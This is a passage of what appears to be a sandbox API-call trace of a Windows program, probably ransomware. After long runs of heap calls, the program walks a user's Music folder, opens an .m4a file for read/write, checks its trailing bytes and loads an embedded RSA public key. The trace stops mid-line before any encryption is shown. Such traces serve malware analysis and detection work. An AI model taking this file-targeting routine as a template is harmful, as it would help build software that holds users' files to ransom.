hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.399] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.412] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.413] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.415] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.416] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.416] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.421] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.421] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0197.428] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\dhVO\\") returned="dhVO\\" [0197.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0197.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40420 | out: hHeap=0x2c0000) returned 1 [0197.428] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\") returned="26hKDH\\" [0197.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea770 [0197.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0197.429] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0197.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea770 | out: hHeap=0x2c0000) returned 1 [0197.430] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0197.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0197.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0197.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.430] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0197.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0197.431] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0197.431] PathFindFileNameW (pszPath="") returned="" [0197.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0197.431] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\dhVO\\*" (normalized: "c:\\users\\keecfmwgj\\music\\26hkdh\\dhvo\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274a8bd0, ftCreationTime.dwHighDateTime=0x1d89ab3, ftLastAccessTime.dwLowDateTime=0xc09bf590, ftLastAccessTime.dwHighDateTime=0x1d89aee, ftLastWriteTime.dwLowDateTime=0xc09bf590, ftLastWriteTime.dwHighDateTime=0x1d89aee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0197.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0197.434] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x274a8bd0, ftCreationTime.dwHighDateTime=0x1d89ab3, ftLastAccessTime.dwLowDateTime=0xc09bf590, ftLastAccessTime.dwHighDateTime=0x1d89aee, ftLastWriteTime.dwLowDateTime=0xc09bf590, ftLastWriteTime.dwHighDateTime=0x1d89aee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.434] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf58510a0, ftCreationTime.dwHighDateTime=0x1d89f78, ftLastAccessTime.dwLowDateTime=0xff1e1ac0, ftLastAccessTime.dwHighDateTime=0x1d8a433, ftLastWriteTime.dwLowDateTime=0xff1e1ac0, ftLastWriteTime.dwHighDateTime=0x1d8a433, nFileSizeHigh=0x0, nFileSizeLow=0xbd79, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="c-p32.m4a", cAlternateFileName="")) returned 1 [0197.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0197.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x345758 [0197.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0197.435] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\dhVO\\c-p32.m4a") returned=".m4a" [0197.435] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\dhVO\\c-p32.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\26hkdh\\dhvo\\c-p32.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0197.436] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=48505) returned 1 [0197.437] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0197.441] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xbd53, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.441] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.444] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.444] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xbd79, lpOverlapped=0x0) returned 1 [0197.445] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0197.446] lstrlenA (lpString="-----BEGIN PUBLIC 